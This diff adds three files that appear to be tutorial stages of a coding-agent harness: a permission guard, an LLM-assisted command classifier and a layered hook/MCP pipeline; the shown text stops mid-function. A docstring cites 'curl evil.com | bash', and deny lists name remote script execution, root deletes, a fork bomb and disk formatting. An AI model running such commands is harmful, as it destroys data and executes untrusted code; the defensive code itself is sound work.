diff --git a/agents/s13_permission_guard.py b/agents/s13_permission_guard.py new file mode 100644 index 000000000..0a453caca --- /dev/null +++ b/agents/s13_permission_guard.py @@ -0,0 +1,253 @@ +#!/usr/bin/env python3 +# Harness: permission guard -- not every command should run automatically. +""" +s13_permission_guard.py - Permission Guard + +The 5-line string filter from s02 was a toy. It blocks "rm -rf /tmp/old" +(because it contains "rm -rf /") but lets "curl evil.com | bash" run freely. +Real systems need a permission model, not a substring check. + + +--------+ +-------+ +---------+ +------------------+ + | User | ---> | LLM | ---> | bash | ---> | PermissionGuard | + | prompt | | | | command | | classify() | + +--------+ +---+---+ +---------+ +--------+---------+ + ^ | + | +--------+-------+------++ + | | | | | + | allow ask deny edit + | | | | | + +-----------+ user yes? block rewrite + tool_result | command + no -> block + +Key insight: "Permission is not yes/no -- it's a spectrum with five stops." +""" + +import os +import re +import subprocess +from pathlib import Path + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) + +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {WORKDIR}. Use tools to solve tasks. Act, don't explain." + + +# -- Permission patterns -- +ALLOWED_COMMANDS = { + "ls", "cat", "pwd", "echo", "head", "tail", "wc", "sort", + "grep", "find", "git", "which", "type", "file", "diff", + "python", "python3", "node", "npm", "pip", "tree", "du", + "stat", "date", "whoami", "hostname", "uname", +} + +DENIED_PATTERNS = [ + (re.compile(r"rm\s+-rf\s+/(?!\w)"), "Root directory recursive delete"), + (re.compile(r"sudo\s+rm"), "Elevated file deletion"), + (re.compile(r">\s*/etc/"), "Overwrite system config"), + (re.compile(r"curl.*\|\s*(ba)?sh"), "Remote script execution"), + (re.compile(r"wget.*\|\s*(ba)?sh"), "Remote script execution"), + (re.compile(r"chmod\s+-R\s+777\s+/"), "Recursive 777 on root"), + (re.compile(r"dd\s+.*of=/dev/"), "Raw device write"), + (re.compile(r"mkfs\."), "Filesystem format"), + (re.compile(r":\(\)\{.*:\|:&\}"), "Fork bomb"), + (re.compile(r"\b(shutdown|reboot|halt|poweroff)\b"), "System shutdown"), +] + +ASK_PATTERNS = [ + (re.compile(r"rm\s+"), "File deletion"), + (re.compile(r"sudo\s+"), "Elevated privileges"), + (re.compile(r"pip\s+install"), "Package installation"), + (re.compile(r"npm\s+install"), "Package installation"), + (re.compile(r"git\s+push"), "Git push"), + (re.compile(r"git\s+reset"), "Git reset"), + (re.compile(r"docker\s+rm"), "Docker remove"), + (re.compile(r"kill\s+"), "Process termination"), +] + +EDIT_REWRITE_RULES = [ + (re.compile(r"rm\s+-rf\s+(.+)"), r"rm -r \1"), +] + + +# -- PermissionGuard -- +class PermissionGuard: + def __init__(self): + self._denied = DENIED_PATTERNS + self._ask = ASK_PATTERNS + self._edit = EDIT_REWRITE_RULES + + def classify(self, command: str) -> tuple[str, str]: + """Return (mode, reason).""" + # 0. compound command check + has_compound = bool(re.search(r'[;&|`]|\$\(', command)) + # 1. deny -- always check full command + for pat, reason in self._denied: + if pat.search(command): + return ("deny", reason) + # 2. whitelist (single commands only) + base = command.split()[0] if command.split() else "" + if base in ALLOWED_COMMANDS and not has_compound: + return ("allow", "") + # 3. edit + for pat, replacement in self._edit: + if pat.search(command): + rewritten = pat.sub(replacement, command) + return ("edit", rewritten) + # 4. ask + for pat, reason in self._ask: + if pat.search(command): + return ("ask", reason) + # 5. default allow + return ("allow", "") + + def check(self, command: str) -> tuple[bool, str, str]: + """Return (allowed, command_to_run, reason).""" + mode, info = self.classify(command) + if mode == "deny": + return (False, command, info) + elif mode == "ask": + approved = self._prompt_user(command, info) + return (approved, command, info) + elif mode == "edit": + return (True, info, "Auto-rewritten") + else: + return (True, command, "") + + def _prompt_user(self, command: str, reason: str) -> bool: + print(f"\033[33m[permission:ask] {reason}\033[0m") + print(f"\033[33m Command: {command}\033[0m") + ans = input("\033[33m Allow? (y/n) \033[0m").strip().lower() + return ans == "y" + + +GUARD = PermissionGuard() + + +# -- Tool implementations -- +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + allowed, cmd, reason = GUARD.check(command) + if not allowed: + mode, _ = GUARD.classify(command) + if mode == "deny": + return f"Permission denied: {reason}" + return f"User declined: {reason}" + if cmd != command: + print(f"\033[33m[permission:edit] {command} -> {cmd}\033[0m") + try: + r = subprocess.run(cmd, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines)[:50000] + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + fp = safe_path(path) + content = fp.read_text() + if old_text not in content: + return f"Error: Text not found in {path}" + fp.write_text(content.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + + +TOOL_HANDLERS = { + "bash": lambda **kw: run_bash(kw["command"]), + "read_file": lambda **kw: run_read(kw["path"], kw.get("limit")), + "write_file": lambda **kw: run_write(kw["path"], kw["content"]), + "edit_file": lambda **kw: run_edit(kw["path"], kw["old_text"], kw["new_text"]), +} + +TOOLS = [ + {"name": "bash", "description": "Run a shell command. Permission-checked: dangerous commands are blocked, some require confirmation.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, +] + + +def agent_loop(messages: list): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + results = [] + for block in response.content: + if block.type == "tool_use": + handler = TOOL_HANDLERS.get(block.name) + try: + output = handler(**block.input) if handler else f"Unknown tool: {block.name}" + except Exception as e: + output = f"Error: {e}" + print(f"> {block.name}:") + print(str(output)[:200]) + results.append({"type": "tool_result", "tool_use_id": block.id, "content": str(output)}) + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + history = [] + while True: + try: + query = input("\033[36ms13 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history) + response_content = history[-1]["content"] + if isinstance(response_content, list): + for block in response_content: + if hasattr(block, "text"): + print(block.text) + print() diff --git a/agents/s14_security_classifier.py b/agents/s14_security_classifier.py new file mode 100644 index 000000000..0cafb2bd5 --- /dev/null +++ b/agents/s14_security_classifier.py @@ -0,0 +1,278 @@ +#!/usr/bin/env python3 +# Harness: security classifier -- let the model judge its own commands. +""" +s14_security_classifier.py - Security Classifier + +Regex patterns from s13 match shapes, not intent. rm -rf build/ and +rm -rf / look identical to a regex. The LLM can judge context. + + Command + | + v + +--------------------+ + | Layer 1: Quick Scan| regex patterns (zero cost) + +--------+-----------+ + | + matched? --yes--> deny/ask + | + no + v + +--------------------+ + | Layer 2: LLM Class | ~10 tokens per call + +--------+-----------+ + | + safe / moderate / dangerous + | + allow / ask / deny + +Key insight: "Regex sees patterns; the LLM sees intent." +""" + +import os +import re +import subprocess +from pathlib import Path + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) + +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {WORKDIR}. Use tools to solve tasks. Act, don't explain." + + +# -- Layer 1: regex quick-scan patterns -- +DANGEROUS_PATTERNS = [ + (re.compile(r"rm\s+-rf\s+/(?!\w)"), "Root recursive delete"), + (re.compile(r"sudo\s+"), "Elevated privileges"), + (re.compile(r">\s*/etc/"), "Overwrite system config"), + (re.compile(r"curl.*\|\s*(ba)?sh"), "Remote code execution"), + (re.compile(r"wget.*\|\s*(ba)?sh"), "Remote code execution"), + (re.compile(r"chmod\s+-R\s+777\s+/"), "Recursive 777"), + (re.compile(r"dd\s+.*of=/dev/"), "Raw device write"), + (re.compile(r"mkfs\."), "Filesystem format"), + (re.compile(r":\(\)\{.*:\|:&\}"), "Fork bomb"), + (re.compile(r"\b(shutdown|reboot|halt|poweroff)\b"), "System shutdown"), + (re.compile(r"crontab\s+-r"), "Delete crontab"), + (re.compile(r"git\s+push\s+--force"), "Force push"), + (re.compile(r"git\s+reset\s+--hard"), "Hard reset"), + (re.compile(r"npm\s+publish"), "Publish package"), + (re.compile(r">\s*/dev/sd"), "Write to raw disk"), +] + +SAFE_COMMANDS = { + "ls", "cat", "pwd", "echo", "head", "tail", "wc", "sort", + "grep", "find", "git", "which", "type", "file", "diff", + "python", "python3", "node", "npm", "pip", "tree", "du", + "stat", "date", "whoami", "hostname", "uname", "true", "false", +} + +CLASSIFIER_PROMPT = """Classify this shell command's danger level. +Reply with EXACTLY one word: safe, moderate, or dangerous. + +- safe: read-only or non-destructive (ls, cat, git status) +- moderate: writes files but recoverable (rm single file, pip install) +- dangerous: irreversible or system-wide (rm -rf /, sudo, force push) + +Command: {command} +Context (last task): {context}""" + + +# -- SecurityClassifier -- +class SecurityClassifier: + def __init__(self, client, model): + self.client = client + self.model = model + # Note: s13 had an "edit" mode that rewrites commands (e.g. rm -rf -> rm -r). + # s14 replaces this with LLM classification: the model judges intent instead + # of mechanically rewriting patterns. "moderate" -> ask the user. + + def quick_scan(self, command: str) -> tuple[str, str] | None: + """Layer 1: regex quick-scan. Return (level, reason) or None.""" + for pat, reason in DANGEROUS_PATTERNS: + if pat.search(command): + return ("dangerous", reason) + return None + + def llm_classify(self, command: str, context: str = "") -> str: + """Layer 2: LLM classification. Return safe/moderate/dangerous.""" + prompt = CLASSIFIER_PROMPT.format(command=command, context=context[-300:]) + try: + resp = self.client.messages.create( + model=self.model, + messages=[{"role": "user", "content": prompt}], + max_tokens=10, + ) + answer = resp.content[0].text.strip().lower() + for level in ("safe", "moderate", "dangerous"): + if level in answer: + return level + except Exception as e: + print(f"[classifier:llm] fallback to moderate: {e}") + return "moderate" + + def classify(self, command: str, context: str = "") -> dict: + """Full two-layer pipeline.""" + # Layer 1 + quick = self.quick_scan(command) + if quick: + level, reason = quick + return {"level": level, "mode": "deny", "reason": reason, "source": "pattern"} + # Whitelist + base = command.split()[0] if command.split() else "" + has_compound = bool(re.search(r'[;&|`]|\$\(', command)) + if base in SAFE_COMMANDS and not has_compound: + return {"level": "safe", "mode": "allow", "reason": "", "source": "whitelist"} + # Layer 2 + level = self.llm_classify(command, context) + mode = {"safe": "allow", "moderate": "ask", "dangerous": "deny"}[level] + return {"level": level, "mode": mode, "reason": f"LLM: {level}", "source": "llm"} + + +# -- PermissionGuard (upgraded with classifier) -- +class PermissionGuard: + def __init__(self, classifier: SecurityClassifier = None): + self.classifier = classifier + + def check(self, command: str, context: str = "") -> tuple[bool, str, str]: + """Return (allowed, command_to_run, reason).""" + result = self.classifier.classify(command, context) + mode = result["mode"] + if mode == "deny": + return (False, command, result["reason"]) + elif mode == "ask": + approved = self._prompt_user(command, result["reason"]) + return (approved, command, result["reason"]) + else: + return (True, command, "") + + def _prompt_user(self, command: str, reason: str) -> bool: + print(f"\033[33m[security:{reason}]\033[0m") + print(f"\033[33m Command: {command}\033[0m") + ans = input("\033[33m Allow? (y/n) \033[0m").strip().lower() + return ans == "y" + + +CLASSIFIER = SecurityClassifier(client, MODEL) +GUARD = PermissionGuard(classifier=CLASSIFIER) + + +# -- Tool implementations -- +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + allowed, cmd, reason = GUARD.check(command) + if not allowed: + return f"Security denied: {reason}" + try: + r = subprocess.run(cmd, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines)[:50000] + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + fp = safe_path(path) + content = fp.read_text() + if old_text not in content: + return f"Error: Text not found in {path}" + fp.write_text(content.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + + +TOOL_HANDLERS = { + "bash": lambda **kw: run_bash(kw["command"]), + "read_file": lambda **kw: run_read(kw["path"], kw.get("limit")), + "write_file": lambda **kw: run_write(kw["path"], kw["content"]), + "edit_file": lambda **kw: run_edit(kw["path"], kw["old_text"], kw["new_text"]), +} + +TOOLS = [ + {"name": "bash", "description": "Run a shell command. Two-layer security: regex quick-scan + LLM intent classification.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, +] + + +def agent_loop(messages: list): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + results = [] + for block in response.content: + if block.type == "tool_use": + handler = TOOL_HANDLERS.get(block.name) + try: + output = handler(**block.input) if handler else f"Unknown tool: {block.name}" + except Exception as e: + output = f"Error: {e}" + print(f"> {block.name}:") + print(str(output)[:200]) + results.append({"type": "tool_result", "tool_use_id": block.id, "content": str(output)}) + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + history = [] + while True: + try: + query = input("\033[36ms14 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history) + response_content = history[-1]["content"] + if isinstance(response_content, list): + for block in response_content: + if hasattr(block, "text"): + print(block.text) + print() diff --git a/agents/s17_secure_extension_harness.py b/agents/s17_secure_extension_harness.py new file mode 100644 index 000000000..f7817a198 --- /dev/null +++ b/agents/s17_secure_extension_harness.py @@ -0,0 +1,573 @@ +#!/usr/bin/env python3 +# Harness: secure extension -- five layers of defense, one loop. +""" +s17_secure_extension_harness.py - Secure Extension Harness + +s13-s16 each run as a standalone agent. Real systems need all layers +working together inside a single execution pipeline. + + LLM calls tool + | + v + +---------------------+ + | [1] Pre-tool Hook | --block--> return error + +----------+----------+ + v + +---------------------+ + | [2] Classifier | --deny---> return error + +----------+----------+ + v + +---------------------+ + | [3] Permission | --deny---> return error + | | --ask---> user confirm? + +----------+----------+ + v + +---------------------+ + | [4] Execute | built-in handler or MCP + +----------+----------+ + v + +---------------------+ + | [5] Post-tool Hook | observe / log + +----------+----------+ + | + v + return result + +Key insight: "Production harnesses aren't about more features -- they're +about clear responsibilities at every layer." +""" + +import json +import os +import re +import subprocess +import time +from pathlib import Path + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) + +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"""You are a coding agent at {WORKDIR}. +Use tools to solve tasks. The harness enforces security: +dangerous commands are blocked, some require your confirmation. +MCP tools extend your reach beyond built-in tools. Act, don't explain.""" + + +# === SECTION: security_classifier (s14) === + +DANGEROUS_PATTERNS = [ + (re.compile(r"rm\s+-rf\s+/(?!\w)"), "Root recursive delete"), + (re.compile(r"sudo\s+"), "Elevated privileges"), + (re.compile(r">\s*/etc/"), "Overwrite system config"), + (re.compile(r"curl.*\|\s*(ba)?sh"), "Remote code execution"), + (re.compile(r"wget.*\|\s*(ba)?sh"), "Remote code execution"), + (re.compile(r"chmod\s+-R\s+777\s+/"), "Recursive 777"), + (re.compile(r"dd\s+.*of=/dev/"), "Raw device write"), + (re.compile(r"mkfs\."), "Filesystem format"), + (re.compile(r":\(\)\{.*:\|:&\}"), "Fork bomb"), + (re.compile(r"\b(shutdown|reboot|halt|poweroff)\b"), "System shutdown"), + (re.compile(r"crontab\s+-r"), "Delete crontab"), + (re.compile(r"git\s+push\s+--force"), "Force push"), + (re.compile(r"git\s+reset\s+--hard"), "Hard reset"), + (re.compile(r"npm\s+publish"), "Publish package"), + (re.compile(r">\s*/dev/sd"), "Write to raw disk"), +] + +SAFE_COMMANDS = { + "ls", "cat", "pwd", "echo", "head", "tail", "wc", "sort", + "grep", "find", "git", "which", "type", "file", "diff", + "python", "python3", "node", "npm", "pip", "tree", "du", + "stat", "date", "whoami", "hostname", "uname", "true", "false", +} + +CLASSIFIER_PROMPT = """Classify this shell command's danger level. +Reply with EXACTLY one word: safe, moderate, or dangerous. + +- safe: read-only or non-destructive (ls, cat, git status) +- moderate: writes files but recoverable (rm single file, pip install) +- dangerous: irreversible or system-wide (rm -rf /, sudo, force push) + +Command: {command} +Context: {context}""" + + +class SecurityClassifier: + def __init__(self, client, model): + self.client = client + self.model = model + + def quick_scan(self, command: str) -> tuple[str, str] | None: + for pat, reason in DANGEROUS_PATTERNS: + if pat.search(command): + return ("dangerous", reason) + return None + + def llm_classify(self, command: str, context: str = "") -> str: + prompt = CLASSIFIER_PROMPT.format(command=command, context=context[-300:]) + try: + resp = self.client.messages.create( + model=self.model, + messages=[{"role": "user", "content": prompt}], + max_tokens=10, + ) + answer = resp.content[0].text.strip().lower() + for level in ("safe", "moderate", "dangerous"): + if level in answer: + return level + except Exception as e: + print(f"[classifier:llm] fallback to moderate: {e}") + return "moderate" + + def classify(self, command: str, context: str = "") -> dict: + quick = self.quick_scan(command) + if quick: + level, reason = quick + return {"level": level, "mode": "deny", "reason": reason, "source": "pattern"} + base = command.split()[0] if command.split() else "" + has_compound = bool(re.search(r'[;&|`]|\$\(', command)) + if base in SAFE_COMMANDS and not has_compound: + return {"level": "safe", "mode": "allow", "reason": "", "source": "whitelist"} + level = self.llm_classify(command, context) + mode = {"safe": "allow", "moderate": "ask", "dangerous": "deny"}[level] + return {"level": level, "mode": mode, "reason": f"LLM: {level}", "source": "llm"} + + +# === SECTION: permission_guard (s13) === + +class PermissionGuard: + def __init__(self, classifier: SecurityClassifier): + self.classifier = classifier + + def check(self, command: str, context: str = "") -> tuple[bool, str, str]: + result = self.classifier.classify(command, context) + mode = result["mode"] + if mode == "deny": + return (False, command, result["reason"]) + elif mode == "ask": + approved = self._prompt_user(command, result["reason"]) + return (approved, command, result["reason"]) + else: + return (True, command, "") + + def _prompt_user(self, command: str, reason: str) -> bool: + print(f"\033[33m[security:{reason}]\033[0m") + print(f"\033[33m Command: {command}\033[0m") + ans = input("\033[33m Allow? (y/n) \033[0m").strip().lower() + return ans == "y" + + +# === SECTION: hooks (s15) === + +HOOK_EVENTS = ( + "PreToolUse", "PostToolUse", "PreBash", "PostBash", + "AgentStart", "AgentStop", "OnError", "OnCompact", +) +HOOKS_DIR = WORKDIR / ".hooks" + + +class HookManager: + def __init__(self): + self._hooks: dict[str, list] = {e: [] for e in HOOK_EVENTS} + HOOKS_DIR.mkdir(exist_ok=True) + self._load_defaults() + + def _load_defaults(self): + self.register("PreBash", "observe", self._audit_log, + "bash_audit_log", "Log all bash commands") + self.register("PostToolUse", "observe", self._auto_git_add, + "auto_git_add", "Auto git add after write/edit", + tool_filter="write_file") + + def register(self, event: str, mode: str, handler, name: str, + description: str = "", tool_filter: str = None): + self._hooks[event].append({ + "event": event, "mode": mode, "handler": handler, + "name": name, "description": description, "tool_filter": tool_filter, + }) + + def fire(self, event: str, context: dict) -> dict | None: + for hook in self._hooks.get(event, []): + if hook["tool_filter"] and context.get("tool") != hook["tool_filter"]: + continue + result = hook["handler"](context) + if result is None: + continue + if isinstance(result, str): + return {"action": "block", "reason": result, "hook": hook["name"]} + if isinstance(result, dict) and result.get("action") == "block": + return result + return None + + def list_hooks(self) -> str: + lines = [] + for event in HOOK_EVENTS: + for h in self._hooks[event]: + lines.append(f" {event:15} [{h['mode']:7}] {h['name']}: {h['description']}") + return "\n".join(lines) + + def _audit_log(self, context: dict): + log_file = HOOKS_DIR / "audit.jsonl" + entry = {"timestamp": time.time(), + "tool": context.get("tool"), + "command": context.get("input", {}).get("command")} + with log_file.open("a") as f: + f.write(json.dumps(entry) + "\n") + + def _auto_git_add(self, context: dict): + path = context.get("input", {}).get("path", "") + if path: + subprocess.run(["git", "add", path], cwd=WORKDIR, + capture_output=True, text=True) + + +# === SECTION: mcp (s16) === + +MCP_CONFIG_PATH = WORKDIR / ".mcp" / "config.json" +MCP_PROTOCOL_VERSION = "2024-11-05" + + +class MCPServerConfig: + def __init__(self, name: str, transport: str, command: str = "", + url: str = "", args: list = None, env: dict = None): + self.name = name + self.transport = transport + self.command = command + self.url = url + self.args = args or [] + self.env = env or {} + + +class MCPClient: + def __init__(self, config: MCPServerConfig): + self.config = config + self.process = None + self._id = 0 + + def start(self): + if self.config.transport == "stdio" and self.config.command: + cmd = [self.config.command] + self.config.args + env = {**os.environ, **self.config.env} if self.config.env else None + self.process = subprocess.Popen( + cmd, + stdin=subprocess.PIPE, stdout=subprocess.PIPE, + stderr=subprocess.PIPE, cwd=WORKDIR, env=env, + ) + + def _next_id(self) -> int: + self._id += 1 + return self._id + + def _send_rpc(self, method: str, params: dict = None) -> dict: + request = {"jsonrpc": "2.0", "method": method, "id": self._next_id()} + if params: + request["params"] = params + self.process.stdin.write((json.dumps(request) + "\n").encode()) + self.process.stdin.flush() + line = self.process.stdout.readline().decode().strip() + return json.loads(line).get("result", {}) if line else {} + + def discover_tools(self) -> list: + result = self._send_rpc("tools/list") + return result.get("tools", []) + + def call(self, tool_name: str, arguments: dict) -> str: + result = self._send_rpc("tools/call", {"name": tool_name, "arguments": arguments}) + contents = result.get("content", []) + return "\n".join(c.get("text", "") for c in contents if c.get("type") == "text") + + def shutdown(self): + if self.process: + self.process.terminate() + self.process.wait(timeout=5) + + +class MCPManager: + def __init__(self): + self._clients: dict[str, MCPClient] = {} + self._tools: dict[str, tuple[str, dict]] = {} + + def load_config(self) -> list[MCPServerConfig]: + if not MCP_CONFIG_PATH.exists(): + return [] + data = json.loads(MCP_CONFIG_PATH.read_text()) + servers = data.get("mcpServers", {}) + return [MCPServerConfig(name=k, **v) for k, v in servers.items()] + + def connect_all(self) -> list[dict]: + discovered = [] + for config in self.load_config(): + try: + c = MCPClient(config) + c.start() + tools = c.discover_tools() + self._clients[config.name] = c + for tool in tools: + self._tools[tool["name"]] = (config.name, tool) + discovered.append(tool) + except Exception as e: + print(f"[mcp] Failed to connect {config.name}: {e}") + return discovered + + def call(self, tool_name: str, arguments: dict) -> str: + if tool_name not in self._tools: + return f"Unknown MCP tool: {tool_name}" + server_name, _ = self._tools[tool_name] + return self._clients[server_name].call(tool_name, arguments) + + def shutdown_all(self): + for c in self._clients.values(): + c.shutdown() + + def list_servers(self) -> str: + lines = [] + for name, c in self._clients.items(): + tools = [t for t, (s, _) in self._tools.items() if s == name] + lines.append(f" {name} ({c.config.transport}): {len(tools)} tools") + return "\n".join(lines) if lines else " (no MCP servers connected)" + + +# === SECTION: initialize all managers === + +CLASSIFIER = SecurityClassifier(client, MODEL) +GUARD = PermissionGuard(classifier=CLASSIFIER) +HOOKS = HookManager() +MCP = MCPManager() + + +# === SECTION: base tools === + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines)[:50000] + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + fp = safe_path(path) + content = fp.read_text() + if old_text not in content: + return f"Error: Text not found in {path}" + fp.write_text(content.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + + +# === SECTION: hook & mcp management tools === + +def hook_register(event: str, mode: str, name: str, + description: str = "", tool_filter: str = None) -> str: + if event not in HOOK_EVENTS: + return f"Unknown event: {event}. Available: {', '.join(HOOK_EVENTS)}" + if mode not in ("observe", "modify", "block"): + return f"Unknown mode: {mode}. Available: observe, modify, block" + # For observe and block, register a simple handler + if mode == "observe": + def handler(ctx): pass + elif mode == "block": + def handler(ctx): return f"Blocked by user hook: {name}" + else: + def handler(ctx): pass + HOOKS.register(event, mode, handler, name, description, tool_filter) + return f"Registered hook '{name}' on {event} ({mode})" + + +def mcp_discover() -> str: + tools = MCP.connect_all() + # Register discovered MCP tools into TOOL_HANDLERS and TOOLS + for tool_schema in tools: + tname = tool_schema["name"] + TOOL_HANDLERS[tname] = (lambda n: lambda **kw: MCP.call(n, kw))(tname) + TOOLS.append(tool_schema) + return f"Discovered {len(tools)} MCP tools" + + +TOOL_HANDLERS = { + "bash": lambda **kw: run_bash(kw["command"]), + "read_file": lambda **kw: run_read(kw["path"], kw.get("limit")), + "write_file": lambda **kw: run_write(kw["path"], kw["content"]), + "edit_file": lambda **kw: run_edit(kw["path"], kw["old_text"], kw["new_text"]), + "hook_register": lambda **kw: hook_register(kw["event"], kw["mode"], kw["name"], + kw.get("description", ""), kw.get("tool_filter")), + "hook_list": lambda **kw: HOOKS.list_hooks(), + "mcp_list_servers": lambda **kw: MCP.list_servers(), + "mcp_discover": lambda **kw: mcp_discover(), +} + +TOOLS = [ + {"name": "bash", "description": "Run a shell command. Routed through security pipeline: hook -> classifier -> permission -> execute -> hook.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "hook_register", "description": "Register a hook to intercept tool calls. Events: PreToolUse, PostToolUse, PreBash, PostBash, AgentStart, AgentStop. Modes: observe, modify, block.", + "input_schema": {"type": "object", "properties": {"event": {"type": "string"}, "mode": {"type": "string"}, "name": {"type": "string"}, "description": {"type": "string"}, "tool_filter": {"type": "string"}}, "required": ["event", "mode", "name"]}}, + {"name": "hook_list", "description": "List all registered hooks.", + "input_schema": {"type": "object", "properties": {}}}, + {"name": "mcp_list_servers", "description": "List connected MCP servers and their tools.", + "input_schema": {"type": "object", "properties": {}}}, + {"name": "mcp_discover", "description": "Re-scan and register MCP tools from all configured servers.", + "input_schema": {"type": "object", "properties": {}}}, +] + + +# === SECTION: pipeline === + +def execute_tool(tool_name: str, tool_input: dict, context: dict) -> str: + # Layer 1: Pre-tool hook + hook_ctx = {"tool": tool_name, "input": tool_input} + pre = HOOKS.fire("PreToolUse", hook_ctx) + if pre and pre.get("action") == "block": + return f"Blocked by hook: {pre['reason']}" + + # Layer 1b: 